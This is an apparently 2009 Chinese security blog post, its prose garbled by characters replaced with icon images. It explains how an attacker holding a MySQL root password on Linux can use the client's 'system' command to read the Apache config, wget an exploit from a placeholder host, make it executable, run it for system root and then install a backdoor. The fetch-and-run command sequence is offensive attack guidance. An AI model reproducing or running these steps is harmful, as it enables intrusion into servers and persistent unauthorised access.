首页 »安全 » mysql5.x溢出:linux下mysql  5.x得到root密码后的另外一种利用方式 »正文
mysql5.x溢出:linux下mysql  5.x得到root密码后的另外一种利用方式
来源: 发布时间:星期六, 2009年9月12日 浏览:20次 评论:0
刚才在卫生间蹲着 ![](/icons/32609de.gif) 时候突然想到这个问题 ![](/icons/32609dou.gif) mysql5.x for linux下面有 ![](/icons/32609yi.gif) 个 ![](/icons/32609hanshu.gif) ![](/icons/32609dou.gif) 可以帮助我们干很多事情 ![](/icons/32609dou.gif) 这个 ![](/icons/32609hanshu.gif) 4 ![](/icons/32609dou2.gif) x下面貌似没 ![](/icons/32609dou.gif) 原来 ![](/icons/32609yi.gif) 直没发现 ![](/icons/32609dou.gif) 也没去查 ![](/icons/32609hanshu.gif) 手册 ![](/icons/32609dou.gif) 就我自己 ![](/icons/32609de.gif) 经验来写点东西 ![](/icons/32609dou2.gif) 4,x ![](/icons/32609de.gif) 明天再看看 ![](/icons/32609hanshu.gif) 手册 ![](/icons/32609dou.gif) 再装 ![](/icons/32609yi.gif) 个实验 ![](/icons/32609yi.gif) 下 mysql 5.x里面引入了 ![](/icons/32609yi.gif) 个system ![](/icons/32609hanshu.gif) ![](/icons/32609dou.gif) 这个 ![](/icons/32609hanshu.gif) 可以执行系统命令 ![](/icons/32609dou.gif) 当mysql以root登陆 ![](/icons/32609de.gif) 时候 ![](/icons/32609dou.gif) 就可以利用这个 ![](/icons/32609hanshu.gif) 执行命令 ![](/icons/32609dou.gif) 当然是在权限许可 ![](/icons/32609de.gif) 范围内
![](/icons/32609yi.gif) 般我们按照常规思路 ![](/icons/32609dou.gif) 搞到mysql ![](/icons/32609de.gif) root密码的后 ![](/icons/32609dou.gif) 我们都会连接上去 ![](/icons/32609dou.gif) 创建 ![](/icons/32609yi.gif) 个表 ![](/icons/32609dou.gif) 然后outfile ![](/icons/32609dou.gif) 搞到 ![](/icons/32609yi.gif) 个webshell ,然后提权如此这般 ![](/icons/32609dou2.gif) 今天我们换 ![](/icons/32609yi.gif) 种方式
按照上面 ![](/icons/32609de.gif) 思路方法 ![](/icons/32609dou.gif) 我们需要知道web ![](/icons/32609de.gif) 绝对路径 ![](/icons/32609dou.gif) 当然这个很不好找 ![](/icons/32609dou.gif) 有些有sqlinjection ![](/icons/32609de.gif) ![](/icons/32609dou.gif) 可能报错会显示出来 ![](/icons/32609dou.gif) 有 ![](/icons/32609de.gif) 就不 ![](/icons/32609yi.gif) 定了 ![](/icons/32609dou2.gif) 但是按照我 ![](/icons/32609de.gif) ![](/icons/32609de.gif) 思路方法 ![](/icons/32609dou.gif) 没有必要再去找web路径了 ![](/icons/32609dou.gif) 直接执行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web ![](/icons/32609de.gif) 路径 ![](/icons/32609dou.gif) 当然 ![](/icons/32609dou.gif) 我们 ![](/icons/32609de.gif) 目 ![](/icons/32609de.gif) 并不是找web路径 ![](/icons/32609dou.gif) 放webshell进去 ![](/icons/32609dou2.gif) 我们是要来做其他 ![](/icons/32609de.gif) 事情 ![](/icons/32609dou.gif) 比如 ![](/icons/32609dou.gif) 下载exp执行 ![](/icons/32609dou.gif) 搞到root权限 ![](/icons/32609dou.gif) 然后装后门虾米
mysql>system wgethttp://xxxx.xxx.com/xxxx ;
mysql>system chmod +x xxxx;
mysql>system ./xxxx;
这样mysql ![](/icons/32609de.gif) root此时就成为system ![](/icons/32609de.gif) root了 ![](/icons/32609dou.gif) 剩下 ![](/icons/32609de.gif) 事情 ![](/icons/32609dou.gif) 如果开了ssh,就ssh上去 ![](/icons/32609dou.gif) 输入mysql ![](/icons/32609de.gif) 用户密码 ![](/icons/32609dou.gif) ok,搞定
或者 ![](/icons/32609dou.gif) 直接提权的后 ![](/icons/32609dou.gif) 下载后门安装 ![](/icons/32609dou.gif) 这个就留给大家去研究了
上 篇文章: 利用系统默认热键做后门
下 篇文章: Linux操作系统中实现DDOS攻击 思路方法
相关文章
读者评论
发表评论
|
|